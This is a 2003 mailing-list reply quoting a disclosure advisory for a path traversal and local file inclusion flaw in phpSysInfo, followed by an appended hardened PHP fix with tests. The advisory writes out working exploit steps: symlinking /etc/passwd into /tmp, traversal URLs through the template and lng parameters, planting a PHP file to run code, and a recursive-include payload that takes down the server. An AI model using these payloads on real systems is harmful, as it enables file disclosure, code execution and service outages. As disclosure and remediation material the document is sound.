Message-ID: <3EA97F0F.3000209@wkamphuis.student.utwente.nl>
Date: Fri, 25 Apr 2003 20:31:43 +0200
From: Wolter Kamphuis <security@...mphuis.student.utwente.nl>
To: ripe@...9ezine.org
Subject: Re: Unauthorized reading files on phpSysInfo


Hi,

In bug report #670222 I described the same problem and how to use it to 
DoS the host. Calling "index.php?lng=../../index" creates a runaway 
recursive loop, creating a huge load and finally crashing the
Apache process. This can easily be used to DoS a web server.
http://sourceforge.net/tracker/index.php?func=detail&aid=670222&group_id=15&atid=100015

On 19 January my fix for this problem was incorporated into the CVS 
repository. This also fixes the problems described in Albert Puigsech 
Galicia's report.
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/phpsysinfo/phpsysinfo-dev/index.php.diff?r1=1.56&r2=1.57

phpSysInfo 2.1 is vulnerable; the CVS versions after 19 January are not.

mzzl
   Wolter Kamphuis



Albert Puigsech Galicia wrote:
> /-----------------------------------------------------------------------------\
> |                             7 A 6 9 - A d v                          C: 007
> |-----------------------------------------------------------------------------|
> |
> |              [ Unauthorized reading files on phpSysInfo ]
> |
> \-----------------------------------------------------------------------------/
>                                                                 | 01/04/2003 |
> 
> 
> Data.
> -----
> 
>         + Type:         To gain visibility.
> 
>         + Software:     phpSysInfo.
> 
>         + Versions:     up to 2.1 (current version).
> 
>         + Exploit:      Yes (but only local).
> 
>         + Author:       Albert Puigsech Galicia
> 
>         + Contact:      ripe@...9ezine.org
> 
> 
> 
> Information.
> ------------
> 
>         PhpSysInfo is a little PHP script intended to show system information.
> It shows data like CPU or memory usage, disk usage, PCI, Ethernet, and IDE
> information, etc. Visit the project website at http://phpsysinfo.sourceforge.net
> for more info.
> 
> 
> Description.
> ------------
> 
>         PhpSysInfo uses a template system via the 'template' variable, and a
> language system via the 'lng' variable. These variables are used to build
> a file path without checking whether they contain the '..' special directory,
> allowing any file on the system to be read as the web server user.
> 
> 
> Exploiting.
> -----------
> 
>         Exploiting this vulnerability requires write access to a local
> directory from which the web server can read files.
> 
>         In the template case, phpSysInfo checks only whether the template
> exists. To do so, it only checks whether 'templates/$template' exists.
> 
> 
> ---/ index.php /---
> 
> if (!((isset($template) && file_exists("templates/$template")) || $template == 'xml')) {
>     // default template we should use if we don't get an argument.
>     $template = 'classic';
> }
> 
> ---/ index.php /---
> 
> 
>         Exactly the same applies to the language selection system.
> 
> 
> ---/ index.php /---
> 
> if (!(isset($lng) && file_exists('./includes/lang/' . $lng . '.php'))) {
>     $lng = 'en';
>     // see if the browser knows the right language.
>     if(isset($HTTP_ACCEPT_LANGUAGE)) {
>         $plng = split(',', $HTTP_ACCEPT_LANGUAGE);
>         if(count($plng) > 0) {
>             while(list($k,$v) = each($plng)) {
>                 $k = split(';', $v, 1);
>                 $k = split('-', $k[0]);
>                 if(file_exists('./includes/lang/' . $k[0] . '.php')) {
>                     $lng = $k[0];
>                     break;
>                 }
>             }
>         }
>     }
> }
> 
> ---/ index.php /---
> 
>         The 'template' variable will be used to build the file paths
> './templates/$template/form.tpl' and './templates/$template/box.tpl'
> for the template handling, so it is necessary to create symlinks to read
> any file accessible to the web server.
> 
> 
>         local ~$ ln -s /etc/passwd /tmp/form.tpl
>         local ~$ ln -s /etc/passwd /tmp/box.tpl
> 
>         http://vulnerable/index.php?template=../../../../tmp
> 
> 
>         The 'lng' variable is used in this piece of code:
> 
> ---/ index.php /---
> 
> require('./includes/lang/' . $lng . '.php');   // get our language include
> 
> ---/ index.php /---
> 
> 
>         It allows us, in the same way as 'template', to read a file on
> the system.
> 
> 
>         local ~$ ln -s /etc/passwd /tmp/p.php
> 
>         http://vulnerable/index.php?lng=../../../../tmp/p
> 
> 
>         But it also allows executing arbitrary PHP code, by creating the PHP
> file first.
> 
> 
>         local ~$ echo "<?php phpinfo() ?>" > /tmp/p.php
> 
>         http://vulnerable/index.php?lng=../../../../tmp/p
> 
> 
>         The use of the '.' PHP operator to concatenate strings prevents a remote
> exploit for this vulnerable PHP script, because we can't use %00 to end the string.
> 
> 
> Patch.
> ------
> 
>         There is no official patch, but it is easy to code one by adding some
> regex to the code to filter '..' content in the 'template' and 'lng' variables.
> 
> 
> 
> --
> 
>>====================================
>>Albert Puigsech Galicia (7a69)
>>
>>http://ripe.7a69ezine.org
>>====================================
> 
> 
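A hardened version of the two selection blocks quoted in the advisory, written here as an added example (it is not phpSysInfo's code, nor the fix Wolter committed to CVS): the language code and template name are checked against an allowlist pattern before they are used in a path, and the template directory is canonicalised with realpath() and required to lie inside templates/. It assumes the directory layout the advisory shows (includes/lang/<lng>.php, templates/<name>/form.tpl and box.tpl) and reads its parameters from $_GET and $_SERVER rather than register_globals; the constructed inputs at the end are the advisory's own payloads.

```php
<?php
// Added example, not phpSysInfo's code: allowlist-based selection of the
// language and template files that index.php includes, in place of the
// file_exists()-only checks quoted in the advisory. Assumes the layout the
// advisory shows (includes/lang/<lng>.php, templates/<name>/{form,box}.tpl)
// and reads the parameters from $_GET rather than register_globals.

define('LANG_DIR', __DIR__ . '/includes/lang');
define('TEMPLATE_DIR', __DIR__ . '/templates');

// Candidate language codes: the lng parameter first, then the primary
// subtags of Accept-Language ("es-ES;q=0.8" -> "es").
function language_candidates(?string $requested, ?string $acceptLanguage): array
{
    $candidates = [];
    if ($requested !== null) {
        $candidates[] = $requested;
    }
    if ($acceptLanguage !== null) {
        foreach (explode(',', $acceptLanguage) as $range) {
            $tag = strtolower(trim(explode(';', $range, 2)[0]));
            $candidates[] = explode('-', $tag, 2)[0];
        }
    }
    return $candidates;
}

// Only a two-letter lowercase code may name a language file, so '..', '/'
// and NUL bytes never reach require(). The recursive self-include from
// lng=../../index is ruled out for the same reason.
function select_language(array $candidates, string $default = 'en'): string
{
    foreach ($candidates as $code) {
        if (preg_match('/\A[a-z]{2}\z/', $code) === 1
            && is_file(LANG_DIR . '/' . $code . '.php')) {
            return $code;
        }
    }
    return $default;
}

// A template name must be a single plain path component, and the resolved
// directory must still be inside TEMPLATE_DIR after symlinks are followed,
// so a link planted in /tmp cannot be reached even if the name check were
// bypassed. 'xml' is built in and touches no files.
function select_template(?string $requested, string $default = 'classic'): string
{
    if ($requested === 'xml') {
        return 'xml';
    }
    if ($requested === null || preg_match('/\A[A-Za-z0-9_-]+\z/', $requested) !== 1) {
        return $default;
    }
    $base = realpath(TEMPLATE_DIR);
    $dir  = realpath(TEMPLATE_DIR . '/' . $requested);
    if ($base === false || $dir === false
        || strncmp($dir, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0
        || !is_file($dir . '/form.tpl') || !is_file($dir . '/box.tpl')) {
        return $default;
    }
    return $requested;
}

// Self-check with the advisory's payloads (constructed inputs): each one
// falls back to the default instead of reaching the filesystem.
assert(select_language(language_candidates('../../../../tmp/p', null)) === 'en');
assert(select_language(language_candidates('../../index', null)) === 'en');
assert(select_template('../../../../tmp') === 'classic');
assert(select_template("classic\0../../tmp") === 'classic');

$lng      = select_language(language_candidates($_GET['lng'] ?? null,
                                                $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? null));
$template = select_template($_GET['template'] ?? null);

require LANG_DIR . '/' . $lng . '.php';
$form = file_get_contents(TEMPLATE_DIR . '/' . $template . '/form.tpl');
$box  = file_get_contents(TEMPLATE_DIR . '/' . $template . '/box.tpl');
```

The design point is that file_exists() is a presence check, not an authorisation check: a symlink in /tmp exists and is readable, so it passes. Restricting the value to a shape that cannot contain a path separator or a dot component is what closes both the traversal and the self-include loop, and the realpath() containment test on the template directory is the belt-and-braces check for anything the web server can follow. The assert() lines are only there so the example verifies its own behaviour when run with zend.assertions enabled; drop them in a deployment.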


